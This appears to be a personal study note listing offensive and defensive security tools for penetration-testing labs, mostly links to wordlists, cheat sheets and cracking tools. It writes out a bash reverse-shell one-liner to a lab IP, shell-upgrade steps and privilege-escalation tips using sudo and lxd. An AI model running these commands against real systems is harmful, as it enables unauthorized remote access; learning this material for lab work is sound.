#MOC # Cyber Security Tools **Lists**: [Auto_Wordlists](https://github.com/carlospolop/Auto_Wordlists), [SecLists](https://github.com/danielmiessler/SecLists) (which contains the famous rockyou list of 14+ million actual passwords), [common passwords](https://cybernews.com/best-password-managers/most-common-passwords/). For directory busting SecLists has the `big.txt` list under Web Content (on Kali as `/usr/share/wordlists/dirb/big.txt`). On Kali run `wordlists` to get a list of preinstalled lists (generally in `/usr/share/wordlists/`) On Parrot preinstalled lists are stored in `/opt/useful/`. ^1p1bli **Wikis**: [Hacktricks](https://book.hacktricks.wiki), [PayloadsAllTheThings](https://swisskyrepo.github.io/PayloadsAllTheThings/) **Exploit search engines**: [Exploit Database](https://www.exploit-db.com/), [CVE](https://www.cve.org) ![[Cyber Security#^v2o1pe]] ## Offensive The [[Metasploit Framework]] can be used for all offensive tasks. ### Enumeration (Reconnaissance) ![[Computer Networking#^0dtvb9]] This [wiki](https://github.com/H3r1CH/penetration-testing/tree/main/pentesting-network) provides a nice breakdown of common ports, as does [HackTricks](https://book.hacktricks.wiki/en/network-services-pentesting). If you don't have access to [[Nmap]] its functionality the following sites provide **online Nmap alternatives**: [CanYouSeeMe](https://canyouseeme.org), [Shields Up!](https://www.grc.com/x/ne.dll?bh0bkyd2), [Pentest Tools](https://pentest-tools.com/). For **subdomain enumeration** use [[gobuster]], [DNSdumpster](https://dnsdumpster.com/). To gather information about registered subdomains and for a more thorough DNS lookup use For **directory busting** use [[gobuster]]. To **discover a web site's tech stack** use [Wappalyzer](https://www.wappalyzer.com/) and [Builtwith](https://builtwith.com/). ![[Crocodile Write-up#^08ckfy]] ^pwgwey ![[Linux#^p4xt6p]] ![[Linux#^lqkkxm]] ### Foothold [[Responder]] can be used **to capture NTLM hashes** by setting up fake servers. **Hash crackers**: [[John the Ripper]], [[Hashcat]], [CrackStation](https://crackstation.net) is an online tool **Hash tools:** [[hashID]] for identifying hash type, [[mkpasswd]] can be used to make hashes **Online password/login cracker:** [[Hydra]] **Reverse shell** cheatsheets: [PayloadsAllTheThings](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/), [Reverse Shell Generator](https://www.revshells.com), [webshells](https://github.com/BlackArch/webshells) Here's an example of a common reverse shell command: `bash -i >& /dev/tcp/10.10.14.91/4242 0>&1`. If it does not work, you can wrap it in a `bash -c`: ```sh bash -c "bash -i >& /dev/tcp/10.10.14.91/4242 0>&1" ``` To get a fully functional shell do the following:[^1] ``` python3 -c 'import pty;pty.spawn("/bin/bash")' CTRL+Z stty raw -echo; fg export TERM=xterm-256color ``` If the above does not work because Python is not installed try the following instead: ```sh script /dev/null -c bash ``` [^1]: The original solution used to put `fg` in a separate command which fails with Kali due to mangled carriage returns leading to ^M in output. After [further research](https://security.stackexchange.com/questions/251326/upgrading-a-reverse-shell-with-stty-raw-echo-doesnt-work) it turns out that's because Kali switched to `zsh`. To fix, simply call `fg` in the same line. The same article also suggests `export TERM=xterm-256color` instead of `TERM=xterm`. Another fix is to install `rlwrap` (`sudo apt install rlwrap`) and then call `nc` on Kali with `rlwrap nc ...`. **SQL injection:** [[sqlmap]] ### Privilege Escalation [[PEASS]] will provide loads of useful info. Make a habit of checking `sudo -l` which will give you a list of programs the current user can execute as root. You will require the current user's password. Cross-reference that list with [GTFOBins](https://gtfobins.github.io). When looking for clear text passwords don't forget to check out `/var/www`. ![[Linux#^e2xlsy]] If `lxd` is running, check `groups` to see if current user is member of the `lxd` group. See [[Included Write-up]] for example. For more info see this [article](https://www.hackingarticles.in/lxd-privilege-escalation/) and this [HackTricks article](https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.html). HackTricks has nice checklists for [Linux](https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html), [Windows](https://book.hacktricks.wiki/en/windows-hardening/checklist-windows-privilege-escalation.html), and [macOS](https://book.hacktricks.wiki/en/macos-hardening/macos-security-and-privilege-escalation/index.html), along with corresponding guides. ## Defensive [Canary Tools](https://www.canarytokens.org) will allow you to create **honey pots**. [DNSLeakTest](https://dnsleaktest.com/) can be used to test for **DNS leaks**. ## General ![[Computer Networking#Networking Tools]] **Protocols:** [[SMB]], [[FTP]], [[Telnet]], [[RDP]], [[WinRM]], [[SSH]] [[Impacket]] provides example scripts for accessing many commonly used protocols. **File transfer tools:** [[Rclone]], [[Rsync]], [[SMB]], [[FTP]], [[Python Web Server]] If Python is not available, a web server can also be started with php and Ruby like so: ```sh php -S 0.0.0.0:8000 ruby -run -ehttpd . -p8000 ``` **Databases:** [[Redis]], [[MongoDB]], [[MySQL]], [[PostgreSQL]], [[Microsoft SQL Server]] **Cloud:** [[AWS CLI]] **Accessing web services:** [[cURL]], [[wget]], [[xh]], [Burp Suite](https://portswigger.net/burp/communitydownload) will allow you to intercept and modify web requests via proxy